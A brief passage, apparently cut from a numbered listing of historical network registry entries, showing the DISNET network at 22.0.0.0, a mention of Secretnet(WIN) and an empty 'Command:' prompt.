  12107.       Network Communication Subsystem), and Secretnet(WIN).
  12108.  
  12109. NET : 22.0.0.0 : DISNET :
  12110.  
  12111. -----------------------------------
  12112.  
  12113. Command: